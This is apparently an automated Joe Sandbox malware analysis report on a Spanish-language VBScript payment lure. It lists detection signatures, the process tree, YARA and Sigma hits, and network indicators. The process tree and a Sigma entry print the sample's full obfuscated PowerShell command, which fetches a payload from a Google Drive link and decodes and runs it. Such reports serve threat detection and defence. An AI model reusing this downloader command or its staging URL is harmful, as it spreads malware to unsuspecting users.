Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JUSTIFICANTE DE PAGO.vbs

Overview

General Information

Sample name:JUSTIFICANTE DE PAGO.vbs
Analysis ID:1430767
MD5:fdf5dceb2d284e54cf0a421a463b621d
SHA1:e5f7ec649576934ac61090f1380d23b9d2ac5d09
SHA256:0923a2d6d1c333ebd0f4320b2fe23015ecf70f3ebeb5a89d883b8259869d4743
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7332 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo dg8u,sea=Vic.u$Ge erMUnciabDrvtylDon ee PutnmGlyc ePlat nskovttamalgsopvel.rabb.sAnacep Bltel .ouni.loritSpand(Nstfo$FiskeGBard,aPajamsTuetuhAl,ereCiselsHyp r)Immun ');$Mblements=$Slinter48[0];popess (Agonothet ' seam$Hel.cgArbejlPolygoStadfb Bulea mil ludska: St tREro,ru MatrbGrailrPiot,iExtercHalimeBy.gersti.ueCompasDeafe1Ethan0Almsd7Linea= Ud,tNMineseUd,ikwDeute-K.ystOMarkibEks mjMillieMondncUndelt.rapp BivirSSkizoymuntrs GingtPi.seeDampemArta,.Z nneNSovekeKatystBehag.LimbeWDecaseBillyb obulC.rilal PalaiPjecee,oresnMelletPenna ');popess (Agonothet 'Over.$ YounR RaceuS.ralb lectrFamiliMask.cDi feeHu rarNondeeAxhamsg,bbe1 reol0 Snub7Kri.e.Afr,dHBand.eAktivaMyotod Afkae c tarHegnssValgk[Fa le$Ere.tUEasygn billthasteeOmdebsPalertVisu a ZonkbDockilRo.eseStr,a2Hjeml7 Hjlp]Mi.la=Godsv$MicroSSte.st NudleBestrnHercutNons,r Ba.oyIm.otkGarruk FolkeMaillrIndreiSynale outdrCykeln un eeSuper ');$celandines=Agonothet 'Nbfl.RRa.bruTrst,bOtorrrYpperi,abatcFlommenamnarBranceScreesLindy1.edev0Un.er7Bolon. Eta.D Co loChariwTaarnnSoleml ScanoEks ea TreddS.ambF rudeimo,talKadeneMesat(,earf$GaardMBrystbClumplN,biaeGatt mLrepleFittinP,eintCordesUns,o,wi.es$ KompIProt,sBllebdP rickAfs ukPinnieRetab4Efter7 Dec,)Peace ';$celandines=$Constantias[1]+$celandines;$Isdkke47=$Constantias[0];popess (Agonothet 'Konvo$D sksg .arml ChamoSpdb bForekaOver lDipht:Cit,zhSuffeyForkrdListerVoryso ndymcSpageoTeserrAmantaDab,ilSu.ab=Forem(TraveTMalmieDuknasChlortTo,tu-niobePHa,ndaFejlmt Floth Zadr Men,o$GardeI NivesEpis,dTilbjkRembuk Forge cond4 .jib7Ri.ou)Flirt ');while (!$hydrocoral) {popess (Agonothet 'Drags$ La.egFlo hlLandsoVelgrbPoloeaPremalProgr:me,akDAfregiGirenfHairnfV.jnieKalkurTrstieAfpilnDi hocSuetsiF.actnLan vgGrf.e=Infor$MorgetFakturT ldfuO.stneyderk ') ;popess $celandines;popess (Agonothet 'ApertS Biomt Fonda ObserAnstrtBu.fo-SearcSSa,tal ExpoeU,skyePneu,pCra l Twib4Scute ');popess (Agonothet 'H lpe$ ForsgTaknelZosteo Brugbsvvefa Ge.mlModst:K.wieh prrsy,umildBravurGenudoFeriecZapuso Strur RuskaBloddl Int,=Smaln(LamelTDichoeHa mosQu.nntTin,f-Snup,P,aaseaDisp,tJudash Blan ryg v$Tax eIPiscasKli,kdEcheskNetkokT,aere Canz4 aund7t.ene).ngou ') ;popess (Agonothet 'Disda$ PrergScenalTouchoTra sbD finaSprinlHist :ReproSBiomat Vetco PistwAfbrnwRundtoVeeenoOrthodMythi3Unifo0Kines=Levem$Beva,gDiscelSekito.avfobTe.miarevlelUdben:ReskoSF,ltstR hearNe atgDa,legJurisaraketr UdvinSvarrs .ndesRu.katPlneroRutinf DopifProloeBlomsrAbands.tnkn+Moboc+Apoci%Delta$ EsopS.mitslAlvori UnrenBisamt fvaneu,sacrFarv 4folke8El en.Liberc upero ilduH akpnSteept Anse ') ;$Mblements=$Slinter48[$Stowwood30];}popess (Agonothet 'Tayr $ArmbagQueenlAllezo.mstnbkongsa FremlA.sik:Lege.DLo beo BienmEksameHjulssNden,tTap,oiFennekKohovv,afferEco yeT rjel AndesSilkseSatisr,hilosBaksn Man,a=Sark. Vans GNed,ieAfkastgysen-AiramC B.droCapsinAdiabt KompeSprinn.isfutBolig Phary$ O.onIAlkohsPlombdSenteklimpikKongeeSise.4homon7Bel.c ');popess (Agonothet 'Para,$Deemig Fllel sseoMulslb El,eam anelPs,lm:AgituTgang.eKastrn PhenaNo,prkAffi,tMnstraAmbitk Fste In.er=frekv Fisk[LnsomS Stasy,onvisGlaivt SouveGlaismRudsk. TmthCIsopyo Gl.tnUnprov .jlle Entrrdet ctMedit]Dagos:Endag:DecliFPermirStoppo GenemBelgiBJunipaRe.nfsKl.ppeFrtid6Cornc4Sp,roSAfndetTal.trAcrosiG.oedn MetagNarko(Trfor$ PseuDRailloWhi,emKeybde CystsTreattUnem iC pitk Funkv.idgerm.noseprvebl Venns Unsee uro rsvimls H.lt)Helio ');popess (Agonothet 'Bruse$magt gWag ilAvnedopupilbSaltaaBatiklSlukn: Mo,iR Legga Petrt esole s,ndpE.staeArenanAjoursUnderiStango ShronBlokm Sigil=Teend Skils[CheneSSjipnyO togs vernt ruffeBrnepmSluts.Re,ssTTriloeCa,woxPureetArg.n. ChicE Inten.etshcBu,fpoBr.eod PubliAssonnMis.cgstarn]Tuill:Sulp : poseA HennS AposC RsonI.versIK rsu.kommaGWusppeTi.stt HypeSS ifttLepidrHumifi ,otrnEk.prg,amme(Ba,lo$BourtTFalsieGainsnFrav,aG.dfokOp,evt rmpa.ommekDysan)Bygni ');popess (Agonothet 'Alant$FladbgthramlFolkeo Livsb P.roaMe.halFiske:M,lleMShawwePreinnDecenu,njuraProfilTarint Sti el,ehmrPres nKildeaDelbet R.fli BlatvOverie nudirB usksUn.az9.ntra3Janap=Termo$ FileRCh.mpaPrecitBagste CapipHuehueTillgnDrmmes Nedkisph.gohu,tlnDilet.Syda.s Te,suHaa dbTrilos Sinst Syslr jentiVandsnflunkgCo vi( am,e3serig0 Kom,4Stjer6Jeep,8Dueur3Outsp,Steni2Cysti7 Argu6Tetan4Psych8Nitro)Lubri ');popess $Menualternativers93;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7580 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7420INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x27ba36:$b2: ::FromBase64String(
  • 0x27ba6e:$b2: ::FromBase64String(
  • 0x27baa7:$b2: ::FromBase64String(
  • 0x27bae1:$b2: ::FromBase64String(
  • 0x27bb1c:$b2: ::FromBase64String(
  • 0x27bb58:$b2: ::FromBase64String(
  • 0x27bb95:$b2: ::FromBase64String(
  • 0x27bbd3:$b2: ::FromBase64String(
  • 0x27bc12:$b2: ::FromBase64String(
  • 0x27bc52:$b2: ::FromBase64String(
  • 0x27bc93:$b2: ::FromBase64String(
  • 0x27bcd5:$b2: ::FromBase64String(
  • 0x27bd18:$b2: ::FromBase64String(
  • 0x27bd5c:$b2: ::FromBase64String(
  • 0x27bda1:$b2: ::FromBase64String(
  • 0x27bde7:$b2: ::FromBase64String(
  • 0x27be2e:$b2: ::FromBase64String(
  • 0x27be76:$b2: ::FromBase64String(
  • 0x27bebf:$b2: ::FromBase64String(
  • 0x27bfa3:$b2: ::FromBase64String(
  • 0x27dbcb:$b2: ::FromBase64String(

Other

SourceRuleDescriptionAuthorStrings
amsi64_7420.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x10106:$b2: ::FromBase64String(
  • 0xd4a1:$s1: -join
  • 0x6c4d:$s4: +=
  • 0x6d0f:$s4: +=
  • 0xaf36:$s4: +=
  • 0xd053:$s4: +=
  • 0xd33d:$s4: +=
  • 0xd483:$s4: +=
  • 0xf6d4:$s4: +=
  • 0xf754:$s4: +=
  • 0xf81a:$s4: +=
  • 0xf89a:$s4: +=
  • 0xfa70:$s4: +=
  • 0xfaf4:$s4: +=
  • 0xdbbd:$e4: Get-WmiObject
  • 0xddac:$e4: Get-Process
  • 0xde04:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", ProcessId: 7332, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", ProcessId: 7332, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo dg8u,sea=Vic.u$Ge

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: JUSTIFICANTE DE PAGO.vbsVirustotal: Detection: 9%Perma Link
Source: unknownHTTPS traffic detected: 142.250.101.138:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: Binary string: e.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C843000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D942A24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbfYYo source: powershell.exe, 00000002.00000002.1393917309.000001D95C925000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C8A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C87F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_4 source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D9429C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32/ source: powershell.exe, 00000002.00000002.1394575729.000001D95CB8D000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D9466E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D94671F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7DeP
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comX1
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1347362979.000001D94587B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D946708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
